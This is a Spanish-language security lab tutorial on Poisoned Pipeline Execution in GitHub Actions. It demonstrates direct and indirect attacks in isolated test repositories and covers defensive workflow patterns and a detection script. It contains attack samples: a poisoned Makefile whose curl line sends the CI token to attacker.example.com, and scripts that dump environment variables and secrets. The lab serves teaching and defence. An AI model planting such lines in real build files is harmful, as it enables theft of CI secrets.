Poisoned Pipeline Execution (PPE) ocupa el puesto n.\u00ba 2 en el OWASP CI\/CD Security Top 10<\/strong>. Se trata de una clase de ataques en la que un actor malicioso manipula el proceso de compilaci\u00f3n inyectando c\u00f3digo en las definiciones del pipeline o en los scripts de compilaci\u00f3n, generalmente a trav\u00e9s de un pull request. Una vez que el sistema de CI recoge el cambio, el c\u00f3digo del atacante se ejecuta dentro del entorno de compilaci\u00f3n \u2014 pudiendo exfiltrar secretos, manipular artefactos o pivotar hacia la infraestructura interna.<\/p>\n Este laboratorio pr\u00e1ctico te gu\u00eda a trav\u00e9s de Direct PPE e Indirect PPE<\/strong> en un entorno seguro y aislado de GitHub Actions. Simular\u00e1s los ataques t\u00fa mismo, observar\u00e1s los resultados y luego implementar\u00e1s los patrones defensivos que los detienen.<\/p>\n Al finalizar este laboratorio ser\u00e1s capaz de:<\/p>\n Este laboratorio debe ejecutarse en repositorios de prueba aislados que t\u00fa poseas y controles. Nunca pruebes t\u00e9cnicas de Poisoned Pipeline Execution contra pipelines de producci\u00f3n reales, repositorios compartidos de una organizaci\u00f3n ni proyectos de c\u00f3digo abierto que no te pertenezcan. Todos los ejercicios siguientes utilizan repositorios que creas espec\u00edficamente para este laboratorio. Elim\u00ednalos cuando hayas terminado.<\/strong><\/p>\n PPE explota una suposici\u00f3n fundamental de confianza: el sistema de CI\/CD conf\u00eda en el c\u00f3digo que descarga y ejecuta. Un atacante que pueda influir en qu\u00e9<\/em> c\u00f3digo ejecuta el pipeline puede secuestrar la compilaci\u00f3n. Existen tres variantes reconocidas:<\/p>\n El atacante modifica directamente el archivo de definici\u00f3n del pipeline<\/strong> \u2014 por ejemplo, El atacante no<\/strong> modifica el YAML del workflow. En su lugar, modifica archivos que el pipeline consume<\/em>: un El atacante apunta a un repositorio p\u00fablico<\/strong> haciendo un fork y enviando un pull request. Este es el vector m\u00e1s com\u00fan en el mundo real porque no requiere acceso previo al repositorio objetivo \u2014 solo la capacidad de abrir un PR.<\/p>\n En este ejercicio ver\u00e1s c\u00f3mo GitHub Actions protege<\/strong> contra la forma m\u00e1s simple de D-PPE cuando se utiliza el trigger Crea un nuevo repositorio p\u00fablico llamado Haz commit de esto en la rama Haz fork de Desde el fork, abre un PR contra Navega a la pesta\u00f1a Actions<\/strong>. Ver\u00e1s que el workflow que se ejecut\u00f3 es la versi\u00f3n de la rama base<\/strong> ( Esta es la protecci\u00f3n incorporada<\/strong> de GitHub Actions para el evento Conclusi\u00f3n clave:<\/strong> El trigger El evento En tu repositorio Antes de continuar, ve a Settings → Secrets and variables → Actions<\/strong> del repositorio y a\u00f1ade un secreto de repositorio llamado En el fork, crea un archivo llamado Ahora tambi\u00e9n modifica En su lugar, crea un script malicioso en el fork:<\/p>\n Ahora actualiza el workflow del repositorio v\u00edctima para que invoque este script (simulando un workflow que ejecuta c\u00f3digo descargado):<\/p>\n Abre un PR desde el fork. El workflow se ejecuta desde la definici\u00f3n de la rama base<\/strong>, pero descarga el c\u00f3digo del atacante<\/strong>. El script malicioso Revisa el log de Actions. Ver\u00e1s:<\/p>\n Esto es un caso cl\u00e1sico de Poisoned Pipeline Execution.<\/strong> La definici\u00f3n del workflow es de confianza (rama base), pero el c\u00f3digo que ejecuta<\/em> est\u00e1 controlado por el atacante (checkout de la rama del PR).<\/p>\n Conclusi\u00f3n clave:<\/strong> La combinaci\u00f3n de Indirect PPE es m\u00e1s sutil. El atacante nunca modifica el YAML del workflow \u2014 modifica archivos que el pipeline consume<\/em>. Esto elude la protecci\u00f3n incorporada del trigger En tu repositorio Actualiza el workflow para usar el Makefile:<\/p>\n Observa que esto utiliza el trigger seguro<\/strong> En el fork, modifica solo el Abre un PR desde el fork. El archivo de workflow de la rama base<\/strong> se ejecuta (\u00a1seguro!), pero En el log de Actions ver\u00e1s las variables de entorno volcadas. El comando Conclusi\u00f3n clave:<\/strong> El trigger Ahora que comprendes el ataque, implementemos las defensas.<\/p>\n Si debes usar Regla:<\/strong> Si un workflow con Para la validaci\u00f3n de PRs, usa Incluso si un ataque de I-PPE modifica los scripts de Divide tu CI en dos etapas \u2014 un paso de validaci\u00f3n no confiable y un paso de compilaci\u00f3n confiable:<\/p>\n Los secretos solo est\u00e1n disponibles en workflows activados por pushes a Restringe el Incluso si el atacante exfiltra el Si debes usar Regla:<\/strong> El c\u00f3digo de confianza (rama base) maneja los secretos. El c\u00f3digo no confiable (rama del PR) nunca los toca.<\/p>\n I-PPE es m\u00e1s dif\u00edcil de defender porque el atacante modifica archivos regulares, no definiciones de workflows. Estas son las contramedidas clave.<\/p>\n Crea un archivo Combinado con reglas de protecci\u00f3n de rama que requieran la aprobaci\u00f3n de CODEOWNERS, esto evita que cambios no revisados en archivos cr\u00edticos de compilaci\u00f3n sean mergeados.<\/p>\n Ve a Settings → Actions → General<\/strong> de tu repositorio y bajo \u00abFork pull request workflows from outside collaborators\u00bb, selecciona \u00abRequire approval for all outside collaborators\u00bb<\/strong>. Esto garantiza que un mantenedor deba aprobar expl\u00edcitamente la ejecuci\u00f3n de CI para cada PR externo.<\/p>\n El evento El segundo workflow se ejecuta en el contexto de la rama por defecto<\/strong>, tiene acceso a secretos, pero nunca descarga c\u00f3digo del PR. Este es el patr\u00f3n m\u00e1s seguro para procesamiento post-PR que necesita permisos elevados.<\/p>\n Si debes ejecutar c\u00f3digo del PR con alg\u00fan tipo de acceso, ejec\u00fatalo en un contenedor restringido:<\/p>\n La opci\u00f3n La prevenci\u00f3n es lo mejor, pero la detecci\u00f3n proporciona defensa en profundidad. As\u00ed es como se detectan los intentos de PPE.<\/p>\n Crea un script de detecci\u00f3n que analice los archivos de workflow en busca de indicadores comunes de PPE:<\/p>\n Para monitorizaci\u00f3n a nivel de GitHub Enterprise u organizaci\u00f3n, usa la API del log de auditor\u00eda para rastrear cambios en workflows:<\/p>\n A\u00f1ade un workflow que se\u00f1ale los PRs que modifican archivos cr\u00edticos de compilaci\u00f3n:<\/p>\n Despu\u00e9s de completar el laboratorio:<\/p>\n No dejes workflows de prueba vulnerables ejecut\u00e1ndose en ning\u00fan repositorio que pretendas conservar.<\/p>\n Contin\u00faa fortaleciendo tus conocimientos de seguridad CI\/CD con estas gu\u00edas relacionadas:<\/p>\n Descripci\u00f3n general Poisoned Pipeline Execution (PPE) ocupa el puesto n.\u00ba 2 en el OWASP CI\/CD Security Top 10. Se trata de una clase de ataques en la que un actor malicioso manipula el proceso de compilaci\u00f3n inyectando c\u00f3digo en las definiciones del pipeline o en los scripts de compilaci\u00f3n, generalmente a trav\u00e9s de un pull … Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[55,60],"tags":[],"post_folder":[],"class_list":["post-702","post","type-post","status-publish","format-standard","hentry","category-ci-cd-security","category-threats-attacks"],"_links":{"self":[{"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/posts\/702","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/comments?post=702"}],"version-history":[{"count":1,"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/posts\/702\/revisions"}],"predecessor-version":[{"id":703,"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/posts\/702\/revisions\/703"}],"wp:attachment":[{"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/media?parent=702"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/categories?post=702"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/tags?post=702"},{"taxonomy":"post_folder","embeddable":true,"href":"https:\/\/secure-pipelines.com\/es\/wp-json\/wp\/v2\/post_folder?post=702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\n
pull_request_target<\/code> e Indirect PPE mediante un Makefile envenenado.<\/li>\nRequisitos previos<\/h2>\n
\n
on:<\/code>, jobs:<\/code>, steps:<\/code>).<\/li>\ngit<\/code> y curl<\/code> instalados.<\/li>\n<\/ul>\nAviso de seguridad importante<\/h2>\n
Comprendiendo Poisoned Pipeline Execution<\/h2>\n
Direct PPE (D-PPE)<\/h3>\n
.github\/workflows\/build.yml<\/code>. Si el sistema de CI ejecuta la versi\u00f3n modificada desde la rama del pull request, los comandos arbitrarios del atacante se ejecutan en el entorno de CI.<\/p>\nIndirect PPE (I-PPE)<\/h3>\n
Makefile<\/code>, un script de shell invocado por el workflow, un Dockerfile<\/code>, un archivo de configuraci\u00f3n o incluso un manifiesto de dependencias. La definici\u00f3n del pipeline permanece id\u00e9ntica a la rama base, pero la l\u00f3gica de compilaci\u00f3n ha sido envenenada.<\/p>\nPublic \/ Third-Party PPE (3P-PPE)<\/h3>\n
Diagrama del flujo de ataque<\/h3>\n
\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Attacker \u2502 fork \u2502 Victim Repo \u2502 trigger\u2502 CI\/CD Runner \u2502\n\u2502 (fork\/PR) \u2502\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u25b6\u2502 (base branch) \u2502\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u25b6\u2502 (GitHub \u2502\n\u2502 \u2502 \u2502 \u2502 \u2502 Actions) \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n \u2502 \u2502\n \u2502 1. Modify workflow YAML (D-PPE) \u2502\n \u2502 OR build scripts (I-PPE) \u2502\n \u2502 2. Open Pull Request \u2502\n \u2502 \u2502\n \u2502 3. CI checks out PR code \u25c0\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n \u2502 4. Executes attacker's payload\n \u2502 5. Secrets \/ tokens exfiltrated\n \u25bc\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Impact: secret theft, artifact tampering, lateral movement \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<\/code><\/pre>\nEjercicio 1: Direct PPE \u2014 Modificaci\u00f3n del archivo de workflow<\/h2>\n
pull_request<\/code>.<\/p>\nPaso 1 \u2014 Crear el repositorio v\u00edctima<\/h3>\n
ppe-lab-victim<\/code>. A\u00f1ade el siguiente archivo de workflow:<\/p>\n.github\/workflows\/build.yml<\/code><\/strong><\/p>\nname: Build\n\non:\n pull_request:\n branches: [main]\n\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - name: Checkout code\n uses: actions\/checkout@v4\n\n - name: Build\n run: |\n echo \"Building the project...\"\n echo \"Build completed successfully.\"\n<\/code><\/pre>\nmain<\/code>.<\/p>\nPaso 2 \u2014 Hacer fork y envenenar el workflow (perspectiva del atacante)<\/h3>\n
ppe-lab-victim<\/code> a tu segunda cuenta de GitHub (o usa la misma cuenta para simplificar). En el fork, edita .github\/workflows\/build.yml<\/code>:<\/p>\nname: Build\n\non:\n pull_request:\n branches: [main]\n\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - name: Checkout code\n uses: actions\/checkout@v4\n\n - name: Exfiltrate environment variables\n run: |\n echo \"=== EXFILTRATING ENVIRONMENT ===\"\n env | sort\n echo \"=== GITHUB_TOKEN ===\"\n echo \"Token length: ${#GITHUB_TOKEN}\"\n<\/code><\/pre>\nPaso 3 \u2014 Abrir un Pull Request<\/h3>\n
main<\/code> en el repositorio v\u00edctima.<\/p>\nPaso 4 \u2014 Observar el resultado<\/h3>\n
main<\/code>), no<\/em> la versi\u00f3n modificada del atacante. El paso \u00abExfiltrate environment variables\u00bb no existe en el workflow ejecutado.<\/p>\npull_request<\/code>: siempre utiliza el archivo de workflow de la rama base, no el de la rama del PR. Las modificaciones YAML del atacante son ignoradas.<\/p>\n\n
pull_request<\/code> es seguro contra Direct PPE porque la definici\u00f3n del workflow proviene de la rama base. Sin embargo, esta protecci\u00f3n no se extiende a todos<\/em> los triggers \u2014 como ver\u00e1s a continuaci\u00f3n.<\/p>\n<\/blockquote>\nEjercicio 2: El peligroso
pull_request_target<\/code><\/h2>\npull_request_target<\/code> fue introducido para permitir que los workflows comenten en PRs, les pongan etiquetas o realicen otras acciones que requieren permisos de escritura y acceso a secretos. Se ejecuta en el contexto de la rama base<\/strong>, pero puede configurarse para descargar el c\u00f3digo del PR \u2014 y ah\u00ed es donde reside el peligro.<\/p>\nPaso 1 \u2014 Crear un workflow vulnerable<\/h3>\n
ppe-lab-victim<\/code>, crea un nuevo workflow:<\/p>\n.github\/workflows\/pr-check.yml<\/code><\/strong><\/p>\nname: PR Check\n\non:\n pull_request_target:\n branches: [main]\n\njobs:\n check:\n runs-on: ubuntu-latest\n steps:\n - name: Checkout PR code\n uses: actions\/checkout@v4\n with:\n ref: ${{ github.event.pull_request.head.sha }}\n\n - name: Run tests\n env:\n MY_SECRET: ${{ secrets.MY_SECRET }}\n run: |\n echo \"Running tests on PR code...\"\n cat README.md\n echo \"Tests passed.\"\n<\/code><\/pre>\nMY_SECRET<\/code> con el valor super-secret-token-12345<\/code>.<\/p>\nPaso 2 \u2014 Explotar la vulnerabilidad (perspectiva del atacante)<\/h3>\n
README.md<\/code> (o modifica el existente) y a\u00f1ade esto al final:<\/p>\nThis is a normal README update.\n<\/code><\/pre>\n.github\/workflows\/pr-check.yml<\/code> en el fork. Pero espera \u2014 recuerda que pull_request_target<\/code> ejecuta el workflow de la rama base<\/strong>, por lo que modificar el YAML en el fork no tiene efecto. El atacante necesita un enfoque diferente.<\/p>\ntest.sh<\/code><\/strong><\/p>\n#!\/bin\/bash\necho \"=== Environment Variables ===\"\nenv | sort\necho \"=== Secret Value ===\"\necho \"MY_SECRET=$MY_SECRET\"\n<\/code><\/pre>\n.github\/workflows\/pr-check.yml<\/code><\/strong> (actualizado en la rama base):<\/p>\nname: PR Check\n\non:\n pull_request_target:\n branches: [main]\n\njobs:\n check:\n runs-on: ubuntu-latest\n steps:\n - name: Checkout PR code\n uses: actions\/checkout@v4\n with:\n ref: ${{ github.event.pull_request.head.sha }}\n\n - name: Run tests\n env:\n MY_SECRET: ${{ secrets.MY_SECRET }}\n run: |\n echo \"Running tests on PR code...\"\n chmod +x test.sh\n .\/test.sh\n<\/code><\/pre>\nPaso 3 \u2014 Abrir el PR y observar<\/h3>\n
test.sh<\/code> se ejecuta e imprime el valor del secreto.<\/p>\n=== Environment Variables ===\nGITHUB_TOKEN=ghs_xxxxxxxxxxxxxxxxxxxx\n...\n=== Secret Value ===\nMY_SECRET=super-secret-token-12345\n<\/code><\/pre>\n\n
pull_request_target<\/code> + actions\/checkout<\/code> con ref: ${{ github.event.pull_request.head.sha }}<\/code> + ejecuci\u00f3n de c\u00f3digo descargado + secretos en el entorno es el patr\u00f3n de PPE m\u00e1s peligroso en GitHub Actions.<\/p>\n<\/blockquote>\nEjercicio 3: Indirect PPE \u2014 Envenenamiento de scripts de compilaci\u00f3n<\/h2>\n
pull_request<\/code> contra cambios en los archivos de workflow.<\/p>\nPaso 1 \u2014 Crear un repositorio con compilaci\u00f3n basada en Makefile<\/h3>\n
ppe-lab-victim<\/code>, a\u00f1ade un Makefile<\/code>:<\/p>\n.PHONY: build test\n\nbuild:\n\t@echo \"Compiling project...\"\n\t@echo \"Build successful.\"\n\ntest:\n\t@echo \"Running unit tests...\"\n\t@echo \"All tests passed.\"\n<\/code><\/pre>\n.github\/workflows\/build.yml<\/code><\/strong><\/p>\nname: Build\n\non:\n pull_request:\n branches: [main]\n\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - name: Checkout code\n uses: actions\/checkout@v4\n\n - name: Build project\n run: make build\n\n - name: Run tests\n run: make test\n<\/code><\/pre>\npull_request<\/code>. El YAML del workflow en s\u00ed est\u00e1 protegido.<\/p>\nPaso 2 \u2014 Envenenar el Makefile (perspectiva del atacante)<\/h3>\n
Makefile<\/code> (no toques ning\u00fan archivo de workflow):<\/p>\n.PHONY: build test\n\nbuild:\n\t@echo \"Compiling project...\"\n\t@echo \"Build successful.\"\n\t@echo \"=== PPE: Dumping environment ===\"\n\t@env | sort\n\t@echo \"=== PPE: Exfiltrating token ===\"\n\t@curl -s http:\/\/attacker.example.com\/exfil?token=$$(cat $$GITHUB_TOKEN_PATH 2>\/dev\/null || echo none)\n\ntest:\n\t@echo \"Running unit tests...\"\n\t@echo \"All tests passed.\"\n<\/code><\/pre>\nPaso 3 \u2014 Abrir el PR y observar<\/h3>\n
actions\/checkout<\/code> descarga el c\u00f3digo de la rama del PR<\/strong>, que incluye el Makefile envenenado. Cuando el workflow ejecuta make build<\/code>, ejecuta el Makefile modificado del atacante.<\/p>\ncurl<\/code> fallar\u00e1 (el dominio no existe), pero en un ataque real tendr\u00eda \u00e9xito.<\/p>\n\n
pull_request<\/code> protege el YAML del workflow, pero no<\/strong> protege el contenido del repositorio que el workflow ejecuta. Cualquier archivo que el pipeline ejecute, importe o incluya es un vector potencial de I-PPE: Makefile<\/code>, scripts de package.json<\/code>, Dockerfile<\/code>, .eslintrc.js<\/code>, pytest.ini<\/code>, scripts de shell y m\u00e1s.<\/p>\n<\/blockquote>\nEjercicio 4: Defensa \u2014 Patrones seguros de workflow<\/h2>\n
Patr\u00f3n 1: Nunca hacer checkout del HEAD del PR en workflows con
pull_request_target<\/code><\/h3>\npull_request_target<\/code>, nunca descargues el c\u00f3digo del PR. Opera solo con metadatos:<\/p>\nname: Label PR\n\non:\n pull_request_target:\n types: [opened]\n\njobs:\n label:\n runs-on: ubuntu-latest\n steps:\n # Safe: no checkout at all\n - name: Add label\n uses: actions\/github-script@v7\n with:\n script: |\n await github.rest.issues.addLabels({\n owner: context.repo.owner,\n repo: context.repo.repo,\n issue_number: context.issue.number,\n labels: ['needs-review']\n });\n<\/code><\/pre>\npull_request_target<\/code> no necesita el c\u00f3digo fuente del PR, no lo descargues.<\/p>\nPatr\u00f3n 2: Usar el trigger
pull_request<\/code> y no exponer secretos<\/h3>\npull_request<\/code> y aseg\u00farate de que no se pasen secretos al job:<\/p>\nname: PR Validation\n\non:\n pull_request:\n branches: [main]\n\njobs:\n validate:\n runs-on: ubuntu-latest\n # No secrets referenced anywhere in this job\n steps:\n - uses: actions\/checkout@v4\n\n - name: Lint\n run: npm run lint\n\n - name: Unit tests\n run: npm test\n<\/code><\/pre>\npackage.json<\/code>, el atacante no obtiene secretos porque ninguno est\u00e1 disponible.<\/p>\nPatr\u00f3n 3: Separar workflows de validaci\u00f3n y compilaci\u00f3n<\/h3>\n
# .github\/workflows\/validate.yml \u2014 runs on PRs, no secrets\nname: Validate\n\non:\n pull_request:\n branches: [main]\n\npermissions:\n contents: read\n\njobs:\n validate:\n runs-on: ubuntu-latest\n steps:\n - uses: actions\/checkout@v4\n - run: make lint\n - run: make test-unit\n<\/code><\/pre>\n# .github\/workflows\/build.yml \u2014 runs only on main, full secrets\nname: Build and Deploy\n\non:\n push:\n branches: [main]\n\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: actions\/checkout@v4\n\n - name: Build\n env:\n DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}\n run: make build\n\n - name: Deploy\n run: make deploy\n<\/code><\/pre>\nmain<\/code>, lo cual requiere que el PR haya sido mergeado primero (y por tanto revisado y aprobado).<\/p>\nPatr\u00f3n 4: Minimizar el alcance del token con
permissions<\/code><\/h3>\nGITHUB_TOKEN<\/code> autom\u00e1tico al m\u00ednimo indispensable:<\/p>\nname: PR Check\n\non:\n pull_request:\n branches: [main]\n\npermissions: {} # No permissions at all\n\njobs:\n check:\n runs-on: ubuntu-latest\n permissions:\n contents: read # Only read access, nothing else\n steps:\n - uses: actions\/checkout@v4\n - run: make test\n<\/code><\/pre>\nGITHUB_TOKEN<\/code>, solo puede leer contenido p\u00fablico \u2014 no puede hacer push de c\u00f3digo, crear releases ni acceder a secretos.<\/p>\nPatr\u00f3n 5: Fijar el checkout a la rama base para operaciones sensibles<\/h3>\n
pull_request_target<\/code> y necesitas algo de contexto del PR, haz checkout de la rama base para los pasos sensibles y usa solo metadatos del PR:<\/p>\nname: Secure PR Check\n\non:\n pull_request_target:\n branches: [main]\n\njobs:\n check:\n runs-on: ubuntu-latest\n steps:\n # Check out the BASE branch (trusted code)\n - name: Checkout base branch\n uses: actions\/checkout@v4\n with:\n ref: ${{ github.event.pull_request.base.sha }}\n\n - name: Run trusted build scripts\n env:\n MY_SECRET: ${{ secrets.MY_SECRET }}\n run: |\n # These scripts come from the base branch, not the PR\n .\/scripts\/validate-pr.sh\n<\/code><\/pre>\nEjercicio 5: Defensa \u2014 Protecci\u00f3n contra Indirect PPE<\/h2>\n
CODEOWNERS para archivos cr\u00edticos de compilaci\u00f3n<\/h3>\n
CODEOWNERS<\/code> que requiera la revisi\u00f3n del equipo de seguridad para cualquier cambio en los scripts de compilaci\u00f3n:<\/p>\n# .github\/CODEOWNERS\n\n# Build infrastructure \u2014 require security team review\nMakefile @myorg\/security-team\nDockerfile @myorg\/security-team\n.github\/workflows\/ @myorg\/security-team\nscripts\/ @myorg\/security-team\npackage.json @myorg\/security-team\n*.sh @myorg\/security-team\n<\/code><\/pre>\nRequerir aprobaci\u00f3n antes de que CI se ejecute en PRs externos<\/h3>\n
Usar
workflow_run<\/code> para procesamiento post-PR de confianza<\/h3>\nworkflow_run<\/code> te permite encadenar workflows: primero se ejecuta un workflow de PR seguro y sin secretos, y solo tras su \u00e9xito se ejecuta un workflow de confianza con permisos completos.<\/p>\n# .github\/workflows\/pr-validate.yml \u2014 untrusted, no secrets\nname: PR Validate\n\non:\n pull_request:\n branches: [main]\n\npermissions:\n contents: read\n\njobs:\n validate:\n runs-on: ubuntu-latest\n steps:\n - uses: actions\/checkout@v4\n - run: make lint\n - run: make test\n<\/code><\/pre>\n# .github\/workflows\/pr-post-validate.yml \u2014 trusted, has secrets\nname: PR Post-Validate\n\non:\n workflow_run:\n workflows: [\"PR Validate\"]\n types: [completed]\n\npermissions:\n contents: read\n pull-requests: write\n statuses: write\n\njobs:\n report:\n runs-on: ubuntu-latest\n if: ${{ github.event.workflow_run.conclusion == 'success' }}\n steps:\n # Check out the BASE branch \u2014 never the PR branch\n - name: Checkout base\n uses: actions\/checkout@v4\n\n - name: Post status comment\n uses: actions\/github-script@v7\n with:\n script: |\n const runId = context.payload.workflow_run.id;\n const prNumbers = context.payload.workflow_run.pull_requests.map(pr => pr.number);\n for (const prNumber of prNumbers) {\n await github.rest.issues.createComment({\n owner: context.repo.owner,\n repo: context.repo.repo,\n issue_number: prNumber,\n body: `Validation passed. Workflow run: ${runId}`\n });\n }\n<\/code><\/pre>\nEjecutar c\u00f3digo no confiable en contenedores aislados<\/h3>\n
jobs:\n sandbox-test:\n runs-on: ubuntu-latest\n container:\n image: alpine:3.19\n options: --network none # No network access\n steps:\n - uses: actions\/checkout@v4\n - name: Run untrusted tests\n run: |\n # This runs inside a container with NO network\n # Even if the Makefile tries to exfiltrate, it cannot reach the internet\n apk add --no-cache make\n make test\n<\/code><\/pre>\n--network none<\/code> impide cualquier conexi\u00f3n saliente, haciendo imposible la exfiltraci\u00f3n incluso si el payload del atacante se ejecuta.<\/p>\nEjercicio 6: Detecci\u00f3n<\/h2>\n
Monitorizar comandos sospechosos en logs de CI<\/h3>\n
#!\/bin\/bash\n# detect-ppe.sh \u2014 Scan workflow files for PPE risk indicators\n\nWORKFLOW_DIR=\".github\/workflows\"\nEXIT_CODE=0\n\necho \"=== PPE Risk Scanner ===\"\necho \"\"\n\n# Check 1: pull_request_target with checkout of PR head\nfor file in \"$WORKFLOW_DIR\"\/*.yml \"$WORKFLOW_DIR\"\/*.yaml; do\n [ -f \"$file\" ] || continue\n\n if grep -q \"pull_request_target\" \"$file\"; then\n if grep -q \"github.event.pull_request.head\" \"$file\"; then\n echo \"[CRITICAL] $file: pull_request_target + PR head checkout detected\"\n echo \" This is the classic D-PPE vulnerability.\"\n EXIT_CODE=1\n fi\n fi\ndone\n\n# Check 2: Workflows that execute checked-out scripts\nfor file in \"$WORKFLOW_DIR\"\/*.yml \"$WORKFLOW_DIR\"\/*.yaml; do\n [ -f \"$file\" ] || continue\n\n if grep -qE '\\.\/.*.sh|make |npm run|yarn |python .*\\.py' \"$file\"; then\n if grep -q \"pull_request\" \"$file\"; then\n echo \"[WARNING] $file: PR workflow executes repo scripts (I-PPE risk)\"\n echo \" Ensure no secrets are passed to this job.\"\n fi\n fi\ndone\n\n# Check 3: Secrets used in PR workflows\nfor file in \"$WORKFLOW_DIR\"\/*.yml \"$WORKFLOW_DIR\"\/*.yaml; do\n [ -f \"$file\" ] || continue\n\n if grep -q \"pull_request\" \"$file\"; then\n if grep -q \"\\${{ secrets\\.\" \"$file\"; then\n echo \"[HIGH] $file: Secrets referenced in PR workflow\"\n echo \" Secrets should not be available in PR-triggered workflows.\"\n EXIT_CODE=1\n fi\n fi\ndone\n\n# Check 4: Overly broad permissions\nfor file in \"$WORKFLOW_DIR\"\/*.yml \"$WORKFLOW_DIR\"\/*.yaml; do\n [ -f \"$file\" ] || continue\n\n if grep -q \"pull_request\" \"$file\"; then\n if grep -q \"permissions: write-all\" \"$file\" || ! grep -q \"permissions:\" \"$file\"; then\n echo \"[MEDIUM] $file: PR workflow with broad or unset permissions\"\n echo \" Add explicit 'permissions: {}' or minimal scopes.\"\n fi\n fi\ndone\n\necho \"\"\nif [ $EXIT_CODE -eq 0 ]; then\n echo \"No critical PPE risks detected.\"\nelse\n echo \"Critical PPE risks found. Review the findings above.\"\nfi\n\nexit $EXIT_CODE\n<\/code><\/pre>\nMonitorizaci\u00f3n del log de auditor\u00eda de GitHub<\/h3>\n
# Query audit log for workflow file modifications\ngh api \\\n -H \"Accept: application\/vnd.github+json\" \\\n \/orgs\/{org}\/audit-log?phrase=action:workflows \\\n --paginate | jq '.[] | {actor: .actor, action: .action, repo: .repo, created_at: .created_at}'\n<\/code><\/pre>\nRevisi\u00f3n automatizada de PRs para cambios en archivos de compilaci\u00f3n<\/h3>\n
name: Build File Change Alert\n\non:\n pull_request:\n paths:\n - 'Makefile'\n - 'Dockerfile'\n - '**\/*.sh'\n - 'package.json'\n - '.github\/workflows\/**'\n\njobs:\n alert:\n runs-on: ubuntu-latest\n permissions:\n pull-requests: write\n steps:\n - name: Comment warning\n uses: actions\/github-script@v7\n with:\n script: |\n await github.rest.issues.createComment({\n owner: context.repo.owner,\n repo: context.repo.repo,\n issue_number: context.issue.number,\n body: '\u26a0\ufe0f **Build File Change Detected**\\n\\nThis PR modifies build-critical files. A security team review is required before merging.\\n\\nModified paths trigger: Makefile, Dockerfile, shell scripts, package.json, or workflow files.'\n });\n<\/code><\/pre>\nLimpieza<\/h2>\n
\n
ppe-lab-victim<\/code>.<\/li>\nMY_SECRET<\/code> si el repositorio a\u00fan existe.<\/li>\n<\/ol>\nConclusiones clave<\/h2>\n
\n
pull_request<\/code> es seguro contra D-PPE<\/strong> porque ejecuta el workflow de la rama base, no de la rama del PR.<\/li>\npull_request_target<\/code> + checkout del HEAD del PR es el patr\u00f3n m\u00e1s peligroso<\/strong> en GitHub Actions. Otorga al c\u00f3digo del atacante acceso a secretos y permisos de escritura.<\/li>\nPr\u00f3ximos pasos<\/h2>\n
\n